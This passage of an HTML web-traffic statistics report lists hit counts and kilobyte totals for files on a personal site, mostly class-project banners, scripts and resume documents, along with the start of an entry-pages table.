NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/Elastic/JDrama.html">/ClassWork/IT422/Elastic/JDrama.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>86</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1228</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/Cast.accdb">/ClassWork/IT422/FinalProject/Cast.accdb</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>87</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>128</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.10%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/CastSpryAssets/SpryData.js">/ClassWork/IT422/FinalProject/CastSpryAssets/SpryData.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>88</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/Fearless.xml">/ClassWork/IT422/FinalProject/Fearless.xml</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>89</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>561</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.46%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/IMAGES/Thumbs.db">/ClassWork/IT422/FinalProject/IMAGES/Thumbs.db</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>90</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1234</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/IMAGES/fearleshomebanner.psd">/ClassWork/IT422/FinalProject/IMAGES/fearleshomebanner.psd</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>91</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>552</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.45%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/IMAGES/indexslide.fla">/ClassWork/IT422/FinalProject/IMAGES/indexslide.fla</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>92</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>30</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/IMAGES/toolbar.psd">/ClassWork/IT422/FinalProject/IMAGES/toolbar.psd</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>93</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/ImagesFearless.xml">/ClassWork/IT422/FinalProject/ImagesFearless.xml</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>94</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.00%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/KungFu.xml">/ClassWork/IT422/FinalProject/KungFu.xml</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>95</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1043</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.85%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/PSDfiles/HomeBanner.psd">/ClassWork/IT422/FinalProject/PSDfiles/HomeBanner.psd</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>96</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1562</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.28%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/PSDfiles/bannerdrunk.psd">/ClassWork/IT422/FinalProject/PSDfiles/bannerdrunk.psd</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>97</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1591</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.30%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/PSDfiles/bannerhustlehome.psd">/ClassWork/IT422/FinalProject/PSDfiles/bannerhustlehome.psd</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>98</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1328</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.09%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/PSDfiles/bannerkiss.psd">/ClassWork/IT422/FinalProject/PSDfiles/bannerkiss.psd</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>99</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1228</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/PSDfiles/banneronbak.psd">/ClassWork/IT422/FinalProject/PSDfiles/banneronbak.psd</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>100</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2670</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.19%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/PSDfiles/fearlesscastbanner.psd">/ClassWork/IT422/FinalProject/PSDfiles/fearlesscastbanner.psd</A></FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> </TABLE> <P> <TABLE WIDTH=510 BORDER=2 CELLSPACING=1 CELLPADDING=1> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=CENTER COLSPAN=6>Top 30 of 154 Total URLs By KBytes</TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=center><FONT SIZE="-1">#</FONT></TH> <TH BGCOLOR="#008040" ALIGN=center COLSPAN=2><FONT SIZE="-1">Hits</FONT></TH> <TH BGCOLOR="#FF0000" ALIGN=center COLSPAN=2><FONT SIZE="-1">KBytes</FONT></TH> <TH BGCOLOR="#00E0FF" ALIGN=center><FONT SIZE="-1">URL</FONT></TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>101</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.98%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>13197</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">10.80%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/js/jquery-1.7.1.js">/js/jquery-1.7.1.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.47%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2769</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.27%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/documents/JohnnyEdickWebResume.pdf">/documents/JohnnyEdickWebResume.pdf</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2670</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.19%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/PSDfiles/fearlesscastbanner.psd">/ClassWork/IT422/FinalProject/PSDfiles/fearlesscastbanner.psd</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.29%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1793</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.47%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/documents/Typographic Flash Cards.pdf">/documents/Typographic Flash Cards.pdf</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>102</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.00%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1743</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.43%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/js/jquery.fancybox.js">/js/jquery.fancybox.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1591</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.30%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/PSDfiles/bannerhustlehome.psd">/ClassWork/IT422/FinalProject/PSDfiles/bannerhustlehome.psd</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1562</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.28%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/PSDfiles/bannerdrunk.psd">/ClassWork/IT422/FinalProject/PSDfiles/bannerdrunk.psd</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1434</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.17%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/PSDfiles/fearlessimagebanner.psd">/ClassWork/IT422/FinalProject/PSDfiles/fearlessimagebanner.psd</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.35%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1403</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.15%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/indexSlideShow.swf">/ClassWork/IT428/indexSlideShow.swf</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1328</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.09%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/PSDfiles/bannerkiss.psd">/ClassWork/IT422/FinalProject/PSDfiles/bannerkiss.psd</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1234</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/IMAGES/fearleshomebanner.psd">/ClassWork/IT422/FinalProject/IMAGES/fearleshomebanner.psd</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1228</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/Cast.accdb">/ClassWork/IT422/FinalProject/Cast.accdb</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1228</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/PSDfiles/banneronbak.psd">/ClassWork/IT422/FinalProject/PSDfiles/banneronbak.psd</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>29</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.57%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1199</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.98%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/documents/Computer_Resume_ONE_PAGE.doc">/documents/Computer_Resume_ONE_PAGE.doc</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1043</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.85%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/PSDfiles/HomeBanner.psd">/ClassWork/IT422/FinalProject/PSDfiles/HomeBanner.psd</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>16</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1042</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.85%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/johnnyedick.com_sitemap.xml">/johnnyedick.com_sitemap.xml</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.24%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>875</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.72%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/IMAGES/indexslide.swf">/ClassWork/IT422/FinalProject/IMAGES/indexslide.swf</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>259</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.07%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>707</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.58%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/">/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>19</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>561</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.46%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/IMAGES/Thumbs.db">/ClassWork/IT422/FinalProject/IMAGES/Thumbs.db</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>20</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>552</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.45%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/IMAGES/indexslide.fla">/ClassWork/IT422/FinalProject/IMAGES/indexslide.fla</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>16</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.31%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>384</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.31%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/hc2010.swf">/ClassWork/IT428/hc2010.swf</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>96</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.88%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>361</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.30%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/works.html">/works.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>103</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>268</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.22%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/styles.css">/styles.css</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>45</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.88%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>259</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.21%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/">/ClassWork/IT428/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>236</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.19%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/Flex/ChartPresentation.swf">/ClassWork/IT428/Flex/ChartPresentation.swf</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>222</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.18%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/SpryAssets/SpryData.js">/ClassWork/IT422/FinalProject/SpryAssets/SpryData.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>27</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.08%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>222</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.18%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT422/FinalProject/rolloverSpryAssets/SpryData.js">/ClassWork/IT422/FinalProject/rolloverSpryAssets/SpryData.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>28</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>102</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.00%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>188</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.15%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/js/fancyBox.js">/js/fancyBox.js</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>29</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>72</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.41%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>188</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.15%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/styles/jquery.fancybox.css">/styles/jquery.fancybox.css</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>30</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.18%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>182</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.15%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/ClassWork/IT428/SpryAssets/SpryEffects.js">/ClassWork/IT428/SpryAssets/SpryEffects.js</A></FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> </TABLE> <P> <A NAME="TOPENTRY"></A> <TABLE WIDTH=510 BORDER=2 CELLSPACING=1 CELLPADDING=1> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=CENTER COLSPAN=6>Top 20 of 39 Total Entry Pages</TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=center><FONT SIZE="-1">#</FONT></TH> <TH BGCOLOR="#008040" ALIGN=center COLSPAN=2><FONT SIZE="-1">Hits</FONT></TH> <TH BGCOLOR="#FFFF00" ALIGN=center COLSPAN=2><FONT SIZE="-1">Visits</FONT></TH> <TH BGCOLOR="#00E0FF" ALIGN=center><FONT SIZE="-1">URL</FONT></TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>259</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.07%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>172</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">60.56%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/">/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>96</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.88%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">7.39%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/works.html">/works.html</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.18%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.17%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://johnnyedickcom.ipage.com/indexSlideUpTop.html">/indexSlideUpTop.html</A></FONT></TD></TR> 